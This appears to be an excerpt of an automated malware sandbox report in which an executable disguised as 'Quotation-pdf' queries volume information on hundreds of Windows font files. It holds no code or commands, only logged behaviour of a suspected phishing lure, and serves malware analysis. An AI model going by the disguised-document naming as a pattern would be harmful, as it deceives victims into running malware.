Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
